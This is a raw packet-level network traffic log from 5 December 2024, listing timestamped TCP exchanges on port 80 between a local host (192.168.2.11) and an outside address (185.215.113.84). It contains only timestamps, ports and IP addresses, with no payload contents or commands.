Dec 5, 2024 17:32:18.199162960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.199208975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.199459076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.199496984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.200193882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.200252056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.200288057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.200323105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.201067924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.201127052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.201262951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.201299906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.201991081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.202176094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.202229023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.202903032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.202965021 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.203032970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.203064919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.203840017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.203908920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.203929901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.203974009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.204790115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.204840899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.205173969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.205223083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.205712080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.205768108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.205856085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.205971003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.206636906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.206701994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.207020998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.207070112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.207561016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.207616091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.207880974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.207925081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.208496094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.208558083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.208594084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.208626032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.209495068 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.209552050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.209639072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.209681988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.210418940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.210479975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.210796118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.210846901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.211299896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.211347103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.211460114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.211502075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.212224007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.212274075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.212326050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.212490082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.213165045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.213226080 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.213327885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.213367939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.214112043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.214171886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.214174032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.214257956 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.215044022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.215107918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.215686083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.215748072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.215913057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.215967894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.216428995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.216505051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.216877937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.216926098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.217056036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.217097044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.217879057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.217936993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.218077898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.218117952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.218708992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.218755007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.219635010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.219691038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.219727039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.219739914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.219762087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.219784975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.220869064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.220925093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.221534014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.221548080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.221568108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.221585035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.221613884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.222420931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.222467899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.223007917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.223053932 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.223368883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.223422050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.223464966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.223501921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.224349976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.224364042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.224405050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.225265980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.225312948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.225328922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.225363016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.226186991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.226241112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.226243973 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.226275921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.227132082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.227186918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.227472067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.227519035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.228127956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.228179932 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.229420900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.229448080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.229469061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.229487896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.229501009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.229506016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.229984999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.230036974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.230227947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.230272055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.230895996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.230918884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.230952978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.230967045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.231765985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.231818914 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.232074022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.232121944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.232728004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.232779980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.232835054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.232872963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.233659029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.233716965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.233769894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.233901024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.234561920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.234622002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.234704971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.234745026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.235483885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.235537052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.235671043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.235738039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.236433983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.236485958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.236517906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.236553907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.237349987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.237402916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.237559080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.237608910 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.238292933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.238341093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.238744974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.238791943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.239226103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.239272118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.239484072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.239526033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.240183115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.240231037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.241107941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.241125107 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.241139889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.241166115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.241179943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.242018938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.242074966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.242121935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.242161989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.243002892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.243060112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.243547916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.243596077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.243844032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.243891954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.244095087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.244141102 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.244807005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.244867086 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.245122910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.245171070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.245752096 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.245800018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.245887041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.245924950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.246718884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.246777058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.246803999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.246840000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.247575998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.247627974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.390811920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.390830994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.390957117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.391218901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.391268969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.391475916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.391518116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.392182112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.392231941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.392235041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.392270088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.393095970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.393151045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.393498898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.393547058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.394006968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.394056082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.394200087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.394239902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.394948006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.395000935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.395348072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.395395994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.395898104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.395951033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.396054983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.396092892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.396909952 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.396972895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.396990061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.397022963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.397779942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.397844076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.397855043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.397891998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.398781061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.398808956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.398843050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.398857117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.399619102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.399679899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.399749041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.399790049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.400532007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.400593042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.400640011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.400679111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.401482105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.401540995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.401823997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.401874065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.402399063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.402462006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.402504921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.402540922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.403336048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.403394938 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.403579950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.403625965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.404264927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.404320955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.404398918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.404438019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.405296087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.405348063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.405375957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.405414104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.406124115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.406177998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.406187057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.406222105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.407097101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.407149076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.407155991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.407183886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.408025980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.408087969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.408219099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.408262014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.408934116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.408965111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.408984900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.408997059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.409876108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.409926891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.409970045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.410007000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.410832882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.410887003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.410945892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.410984993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.411731005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.411780119 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.411818981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.411855936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.412645102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.412703037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.412903070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.412947893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.413616896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.413649082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.413672924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.413686991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.414499998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.414558887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.414814949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.414865971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.415457010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.415513039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.416258097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.416315079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.416430950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.416445017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.416469097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.416488886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.417311907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.417373896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.417538881 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.417583942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.418257952 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.418313026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.418448925 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.418489933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.419174910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.419209003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.419231892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.419245958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.420169115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.420228004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.420340061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.420392036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.421086073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.421119928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.421140909 CET	49793	80	192.168.2.11	185.215.113.84
